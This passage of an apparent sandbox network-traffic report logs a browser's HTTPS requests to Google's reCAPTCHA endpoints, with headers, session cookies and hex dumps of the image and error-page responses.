                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:36 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:36 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:36 UTC709INData Raw: 31 37 35 64 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 175dJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:36 UTC1390INData Raw: 00 36 3a 16 5e 46 d2 46 09 24 75 e8 3a 57 22 a1 09 5a 56 fe bf af eb 73 b3 9d f2 db 97 4f eb fa f2 b1 ad 0d cd d7 99 24 73 bb 4e 24 89 62 4f 32 12 e5 90 e1 80 65 6e bd 0f af 41 93 ce 6a 34 d4 fe c9 1c 77 76 fa 74 51 ce 25 cc 72 05 c6 d4 fe eb 10 7e 43 87 3c ff 00 b5 f5 ac d9 7c ef 2a 55 96 19 76 b3 1c c9 b7 63 96 3c e3 3c 1f e2 38 18 ec 73 9e d6 fe dc 96 93 dc 4b 3c 63 60 22 39 0b 29 1b 30 b8 5e 01 04 1c 74 e7 f2 c1 04 8d 07 cc ac f4 fe bb 7c bf a6 38 ce 2b dd b7 6f 9d ad fd 7f c1 65 fd 46 71 ae b2 4b a8 4f 79 3c a3 e4 59 19 b8 8d 53 0d b5 98 e4 8f 98 b7 3c 1c 13 f8 39 34 bb 79 98 fd 9e fa ce 69 73 9f de 06 56 7c 63 68 07 20 8f 4c 1c 7a f7 aa e9 f6 29 96 44 f2 24 9e 60 bb 63 90 47 90 d2 63 ef 1d d8 e0 60 0c 64 fa 77 a9 cd a9 21 60 b3 b9 2d fb b6 40 80 64
                                                                                                                          Data Ascii: 6:^FF$u:W"ZVsO$sN$bO2enAj4wvtQ%r~C<|*Uvc<<8sK<c`"9)0^t|8+oeFqKOy<YS<94yisV|ch Lz)D$`cGc`dw!`-@d
                                                                                                                          2024-12-19 16:08:36 UTC1390INData Raw: bf ad 1f fc 39 6e 74 dc ad 14 d7 f4 fd 7d 3e 6c 91 75 8d 4a 4d cf 33 11 23 31 2d b2 da 46 5c 93 93 82 18 7f 2a 2a dc 57 97 89 1a 8b 56 8d 81 19 62 4b fd ef c0 7a 63 f9 d1 5c ee 8d 6b eb f9 a2 b9 9b f8 6a b4 bf af 33 99 86 e1 76 c8 97 0f 01 83 85 96 48 89 e9 c1 e7 b9 f6 1d 32 0e 7a d3 6d c4 91 4f 25 cb 32 00 59 00 54 1f 3a 12 a0 60 82 47 6d ac 7a 1c f1 81 52 42 c4 cb 6c f0 a1 4c 4a 16 4c 21 1f 2b 63 78 c8 24 7f 0f 5e 3a 1f a1 8e d9 d8 82 b0 ac f6 cd 26 15 b7 64 ed 4d e7 82 38 da 78 6e 48 c8 c7 bd 77 a9 75 fe b5 fe bf ae b8 cd 5d 6b af cb bd b7 fe bb 7c d6 39 4e e4 5b a3 11 8e 01 ba 62 d6 de 61 1b 70 bd 33 c8 39 20 1e 7a f7 ec dd 36 35 64 57 9e 13 3d c3 06 fe 21 9c 6e f4 3e 84 93 9c 12 36 f2 3b d0 d2 3d c8 92 59 f6 f9 6d 9c 3c 68 24 e8 83 2d f5 f9 c1 c6 49
                                                                                                                          Data Ascii: 9nt}>luJM3#1-F\**WVbKzc\kj3vH2zmO%2YT:`GmzRBlLJL!+cx$^:&dM8xnHwu]k|9N[bap39 z65dW=!n>6;=Ym<h$-I
                                                                                                                          2024-12-19 16:08:36 UTC1390INData Raw: 04 f1 59 8d e0 db c9 a3 90 78 53 55 87 5b 55 07 cc da fb 6e 40 ea 15 a2 cf 23 93 dc 9c 8e 2b b8 4f 0b 6a fa 0c 6e 3c 3d ac 49 1d be fd cd 65 a9 27 98 85 49 ce 14 8c f7 e3 a2 82 31 f8 f3 9a 87 f6 11 9c 2e b7 a3 ea 1e 0e d4 98 00 97 56 e0 b4 23 19 3b be a0 ff 00 77 8a 6d 26 b9 5e bf 97 f5 6e 85 ae e9 7f 5f d7 fc 16 72 a2 ee f2 c2 e9 ed 6f 2c 6e 20 91 df f7 f1 48 9b 1b 19 39 76 53 f2 9e e0 71 d8 f7 e8 f7 fe cc bd 95 1d 84 61 99 89 2d b8 40 46 d3 cf 1b 59 4f 20 f0 00 fe 75 df dc 1f 14 7d 84 c5 3d b6 91 e3 ad 27 20 a4 c8 c0 c8 14 83 96 dd d4 1e a7 8d c4 56 3c 5a 0f 85 f5 f9 1e db 47 bb 9f 41 d5 06 08 d3 ef e2 ce f6 c1 25 43 9f 98 7d e3 9c e4 9e c2 b9 a5 46 37 ba d3 e7 d3 fa 68 d1 4e 49 5e eb 4e fb 7f 9f e0 b6 38 fb fd 06 cd 67 0d 26 b3 7e 37 a8 2a 23 b3 c0 0a
                                                                                                                          Data Ascii: YxSU[Un@#+Ojn<=Ie'I1.V#;wm&^n_ro,n H9vSqa-@FYO u}=' V<ZGA%C}F7hNI^N8g&~7*#
                                                                                                                          2024-12-19 16:08:36 UTC1110INData Raw: 5d 92 e2 34 b5 b7 b7 4d d2 17 7f ba d2 03 db a7 1f 36 33 bb 38 e3 f2 f4 ef 86 1f 12 56 48 a0 d1 bc 4b 73 24 0c 02 0b 79 e4 e4 63 a0 2e 79 c6 77 36 0e 31 cf 38 eb 56 fe 20 7c 36 b6 d4 a6 6d 47 c3 d0 0b 6b a9 c1 77 b6 8d 84 69 31 0a 39 0c 72 03 67 1d b0 49 1d 3a 85 28 a9 3b 4b fa b6 bf e6 fd 3f 1b 4a 32 d5 bd ba ed a7 6f bb d7 6b 5d 1e 42 9b 3e ca 03 ac 71 04 00 f2 46 10 1f b8 a4 e0 90 73 eb fc b1 5e 93 f0 fb e2 5b 5b 24 7a 46 b5 24 f7 76 88 3e 4b ae be 5e 7b 1c 0c ed eb cf 51 ce 09 02 bc d2 f2 2b 8b 5b e3 0d c4 52 5b 4e 25 fb 92 47 b5 8f 39 ce de 9d ca f2 7f 9f 08 51 ae 22 8e 1b 7e b1 fc 8e 23 c0 de c4 10 46 07 3b 72 c7 9e c0 1c 51 66 f7 fe bf 0f 97 fc 31 33 77 57 97 f5 f7 f9 a7 f2 fb cf a5 75 d3 61 a8 e9 b1 dc 4d 60 75 7b 29 07 9e 3c 84 59 1d c1 c8 24 6d
                                                                                                                          Data Ascii: ]4M638VHKs$yc.yw618V |6mGkwi19rgI:(;K?J2ok]B>qFs^[[$zF$v>K^{Q+[R[N%G9Q"~#F;rQf13wWuaM`u{)<Y$m
                                                                                                                          2024-12-19 16:08:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.1649763172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:35 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:36 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:36 GMT
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Allow: POST
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:36 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                          2024-12-19 16:08:36 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                          Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                                                                                                          2024-12-19 16:08:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.1649767172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:38 UTC836OUTGET /recaptcha/api2/payload?p=06AFcWeA7FMEkEn3AsWDGstm5iD-gQyEvUqp0J___l-WGFyY0VXkDveTeNkvyu6jh75ui6OGd0VXh6MwnUXut8I0Rgbf4I0qHOG5EnlD5L3GT_T6b7PsVKiYN3CqXDjyZJkAW3d-Q7IZ5oIAJrq3C1DHUCmtIDFSvEUp7I_zC6sOKjpcxK7WTsgZ6uaFatqn7MORfxornuDTxQ&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=61c71c20d51b4542 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:38 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:38 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:38 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:38 UTC709INData Raw: 31 37 31 35 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 1715JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:38 UTC1390INData Raw: 04 30 24 fc c7 3d 46 3d f3 50 c3 a8 f8 71 f5 29 be d3 7d 0c 91 c5 14 d8 78 94 86 50 ed 80 9b 49 18 00 60 93 cf 6a 25 17 53 de 8e 96 ef 7f f8 1e 7e 76 66 91 8a e5 d7 cf a3 7e 5f a7 7f b8 cf 55 b6 7b 8b 84 82 dd 76 29 92 30 c1 55 95 8b ca 32 4e ee 41 38 c6 41 e3 15 ca 1b 64 12 40 c2 de 73 29 78 d2 54 8c f2 00 c8 c7 4f 50 ad 9f 71 cf a7 69 7f 3f 85 ae 6c 27 5b 2b 99 e3 98 34 6d b8 42 1f 60 cb 65 b0 0f 38 c9 1f 9d 71 ba ac 56 e7 54 99 23 ba f3 a2 77 44 0c b6 ff 00 29 ca 13 c1 cf 38 fa e3 d7 af 1c d2 d5 bf 2f 9b fe b5 b9 8c e3 cb 2b 45 5a cb 5d ef d3 f1 7b ff 00 c0 2f cf 3c b6 f9 9b 31 ac 4a 49 4f 9d 81 7e 0f 2b 8c 67 f8 b9 19 f5 cf 35 6b c2 da 94 29 77 78 1d d4 a9 50 a6 08 43 10 38 23 71 62 4e d2 7f 1c 7a 9e 2a 82 5d 69 b6 91 f9 2d 6b 23 5c 02 3c c9 25 52 5b
                                                                                                                          Data Ascii: 0$=F=Pq)}xPI`j%S~vf~_U{v)0U2NA8Ad@s)xTOPqi?l'[+4mB`e8qVT#wD)8/+EZ]{/<1JIO~+g5k)wxPC8#qbNz*]i-k#\<%R[
                                                                                                                          2024-12-19 16:08:38 UTC1390INData Raw: 27 8f c4 67 8a e7 9e 2a 69 28 5d eb fd 7f 57 65 42 d6 b2 5f d7 cf 4f 3d 74 b5 fd 4f 27 96 58 63 b5 93 ed 12 c5 6f 29 8d be d6 aa b2 38 6c fd d3 9c 74 c9 db cf 7a 84 5d c5 14 52 ab ea cf 2b 72 d2 1f 29 8e 43 1c fc bd 81 1c 73 c7 51 de bd 86 37 b7 ba 86 57 f2 ed e5 2f 84 60 b8 07 72 80 77 01 8e 4f 43 8e b9 fa 9a a7 79 6b a6 4d 2c 9b 2d 6d 15 93 8f 2d 40 05 cb 61 89 dc 46 50 0c 67 00 7a fa 60 43 c5 45 dd 54 5a fe 5b 7e 1f f0 3b 11 bb b4 d5 da f5 e9 6f f3 fe ac 79 bc 71 e9 77 05 fc f5 8e e1 a3 72 80 fe f0 ed 03 9c 70 be ff 00 ad 15 dd c9 a1 68 db 62 44 91 20 54 8d 40 0b 99 01 ef 9c 81 8e ff 00 e7 34 53 53 a3 2d 79 9a ff 00 c0 bf 47 63 1f 61 19 fb c9 b5 ff 00 81 7e 8c ce d1 bc 43 a3 27 81 ac f4 c3 3c 62 e9 55 d3 26 12 1c 92 e1 c6 49 c7 04 83 d4 e3 91 51 5c 7c
                                                                                                                          Data Ascii: 'g*i(]WeB_O=tO'Xco)8ltz]R+r)CsQ7W/`rwOCykM,-m-@aFPgz`CETZ[~;oyqwrphbD T@4SS-yGca~C'<bU&IQ\|
                                                                                                                          2024-12-19 16:08:38 UTC1390INData Raw: a5 67 ab 7c 3f b0 d9 2c 9a 66 a1 7d 34 58 ca a3 61 50 80 30 06 48 eb c6 46 0f 4c 60 e6 b2 6a da 5b 4f eb f3 08 b5 a3 f9 79 99 77 5e 37 f1 54 f3 61 2e 23 19 70 d0 ed 89 53 8d a4 85 1c 12 0e 0f 5e f9 fa 56 58 d5 7c 47 a8 09 0b ea 17 d2 a0 21 56 30 5d b0 39 c0 cf 38 00 fa 71 c5 74 37 1e 32 d2 6d 99 12 c3 c2 f1 c6 ea c5 51 a5 f9 db 3c e7 b7 20 e4 f4 27 f5 ac b3 e3 5d 4d 44 12 47 0d bc 78 c6 f6 58 89 60 d9 e3 21 b3 8c f7 1d f3 54 a5 cc 9c a4 fb 7f 5f d7 50 6d 34 ec 8b fa 64 37 96 7b e5 bb b4 91 20 97 84 dd 1f dc 19 19 01 87 cb 81 c7 61 d7 34 dd 2e 38 6c d6 e5 e2 91 c6 d1 32 85 94 05 71 86 00 9e 01 0c 78 ea 00 e8 0f 1c 56 44 da c7 88 2f 7c d4 92 e6 59 4e e1 b6 32 c1 07 07 6a 90 00 03 23 07 db 1f 5a d5 8e 09 8d 84 c8 64 95 54 a4 a7 cc e4 15 5d ca d9 24 67 07 8e
                                                                                                                          Data Ascii: g|?,f}4XaP0HFL`j[Oyw^7Ta.#pS^VX|G!V0]98qt72mQ< ']MDGxX`!T_Pm4d7{ a4.8l2qxVD/|YN2j#ZdT]$g
                                                                                                                          2024-12-19 16:08:38 UTC1038INData Raw: cb 9c 85 03 8e fd f8 1d 4d 65 cb 6d a4 43 6b 71 35 c9 4b 97 43 99 59 3c c9 0e 33 cb 2f 38 1d 4f 7a da 99 a6 99 0d 8c 70 ce f7 12 43 b9 41 c1 ca 7d d5 3f 4e 08 e0 7a 1e bc 54 0b 14 ab 19 22 14 55 27 74 87 ca 2c a5 73 c8 3c 7a 71 ce 3a 1f a5 3a 73 95 3d 52 fd 3e 7f e4 6b 1a 72 8c 9b 9f 5d 7f e1 ff 00 e0 1c 95 9e b3 06 9b 70 05 b4 49 32 6e 1b 89 56 55 24 64 83 dc 83 d8 64 81 cf 7a bb 37 8a 75 2b 40 aa ac 8c f2 b8 12 15 18 ca 26 70 33 93 b5 b0 07 6c d6 8d af 87 ec 2f 27 9c dc 5f 0b 62 80 3a 82 85 c4 84 e0 60 60 74 c7 6c 11 92 b5 b3 1f 82 34 5b 30 63 9e 45 bc c0 d8 c1 e4 27 d7 2a 70 30 58 64 80 07 5e 3f 1f 42 35 a3 38 fb ab b7 ab 29 46 fe f2 fe 95 fa bf cb b9 c2 7f 6b ea 77 5e 44 70 dd ca 03 2a ba ee 70 ab ce ec 02 06 32 0f cd db 38 f6 15 56 de c3 52 ba d4 37
                                                                                                                          Data Ascii: MemCkq5KCY<3/8OzpCA}?NzT"U't,s<zq::s=R>kr]pI2nVU$ddz7u+@&p3l/'_b:``tl4[0cE'*p0Xd^?B58)Fkw^Dp*p28VR7
                                                                                                                          2024-12-19 16:08:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.1649768172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:45 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 5942
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://www.google.com
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:45 UTC5942OUTData Raw: 76 3d 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 26 63 3d 30 33 41 46 63 57 65 41 37 67 6d 67 5f 48 75 39 2d 2d 59 4a 55 4c 71 67 48 32 6d 65 68 77 39 5a 41 59 5a 63 57 51 68 65 4b 43 44 79 36 58 32 36 66 35 4d 72 6e 6d 65 6a 58 52 70 6b 65 70 61 73 2d 74 39 65 50 37 64 4a 42 30 79 4d 67 63 75 32 4d 4a 72 2d 5a 69 66 35 32 4a 36 6e 43 52 74 42 45 6c 38 4e 70 67 31 32 6e 78 43 41 71 73 66 45 52 6a 6c 73 31 48 30 5f 41 53 72 5f 5a 58 35 52 42 66 4c 53 34 61 48 54 61 4e 6f 73 70 4d 63 78 4d 66 4e 66 31 31 58 2d 69 5a 31 56 6f 36 55 53 67 35 79 50 2d 48 79 4c 4f 4f 33 34 58 5a 6d 75 44 52 55 62 62 38 59 4d 53 7a 44 6d 4c 65 41 73 5a 33 4f 58 38 43 66 4e 78 63 6d 35 58 48 68 36 2d 64 73 47 68 70 62 45 4f 32 7a 7a 56 47 6a 73 75 67
                                                                                                                          Data Ascii: v=nhamhfA6n_hKMa_Y7UpFyA37&c=03AFcWeA7gmg_Hu9--YJULqgH2mehw9ZAYZcWQheKCDy6X26f5MrnmejXRpkepas-t9eP7dJB0yMgcu2MJr-Zif52J6nCRtBEl8Npg12nxCAqsfERjls1H0_ASr_ZX5RBfLS4aHTaNospMcxMfNf11X-iZ1Vo6USg5yP-HyLOO34XZmuDRUbb8YMSzDmLeAsZ3OX8CfNxcm5XHh6-dsGhpbEO2zzVGjsug
                                                                                                                          2024-12-19 16:08:46 UTC670INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:46 GMT
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
